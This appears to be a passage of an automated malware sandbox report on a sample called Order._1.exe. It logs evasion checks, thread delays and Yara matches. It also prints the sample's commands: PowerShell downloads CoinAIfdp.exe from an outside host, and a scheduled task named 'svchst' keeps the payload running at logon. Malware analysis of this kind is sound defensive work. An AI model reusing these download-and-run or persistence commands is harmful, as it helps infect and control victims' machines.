              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED
              Source: CoinAIfdp.exe, CoinAIfdp.exe, 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, CoinAIfdp.exe, 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, svchst.exe, 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, WindowsCache1289fgbfbfgsdvdh=74937962458.6.dr, windowscachergslog.bin.6.drBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 4FB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2200000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2200000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: BE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2760000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: BE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 1010000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 2B30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: 2960000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 15F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 30D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchst.exeMemory allocated: 2F60000 memory reserve | memory write watch
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Order._1.exeWindow / User API: threadDelayed 464Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5495Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4292Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6099Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3719Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeWindow / User API: threadDelayed 2622Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeWindow / User API: threadDelayed 7215Jump to behavior
              Source: C:\Users\user\Desktop\Order._1.exe TID: 7608Thread sleep count: 464 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 5495 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep count: 4292 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7852Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 6099 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 3719 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep time: -16602069666338586s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 8012Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 8036Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 8028Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 5856Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7848Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7752Thread sleep count: 47 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7752Thread sleep time: -43349848573217419s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7744Thread sleep count: 2622 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7744Thread sleep count: 7215 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 5396Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 6900Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 7532Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe TID: 7724Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7776Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\svchst.exe TID: 7772Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\svchst.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 60000
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 60000
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 60000
              Source: C:\Users\user\AppData\Roaming\svchst.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user~1\Jump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user\AppData\Local\Temp\6318.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.tmpJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
              Source: windowscachergslog.bin.6.drBinary or memory string: vmware
              Source: CoinAIfdp.exe, 00000006.00000002.1485763176.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllf*L
              Source: svchst.exe, 0000000D.00000002.2587661382.0000000000767000.00000004.00000020.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2598390866.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2598567452.0000000004CA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_0040A756
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchst.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_00409950 SetUnhandledExceptionFilter,0_2_00409950
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,0_2_00409930
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\Order._1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6318.tmp\6319.tmp\631A.bat C:\Users\user\Desktop\Order._1.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe CoinAIfdp.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' & exitJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp87D1.tmp.bat""Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchst" /tr '"C:\Users\user\AppData\Roaming\svchst.exe"' Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchst.exe "C:\Users\user\AppData\Roaming\svchst.exe" Jump to behavior
              Source: svchst.exe, 0000000D.00000002.2589796461.0000000002625000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.0000000002660000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.000000000262B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: svchst.exe, 0000000D.00000002.2589796461.0000000002625000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.0000000002660000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.000000000262B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe
              Source: svchst.exe, 0000000D.00000002.2589796461.0000000002625000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.0000000002660000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.000000000262B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
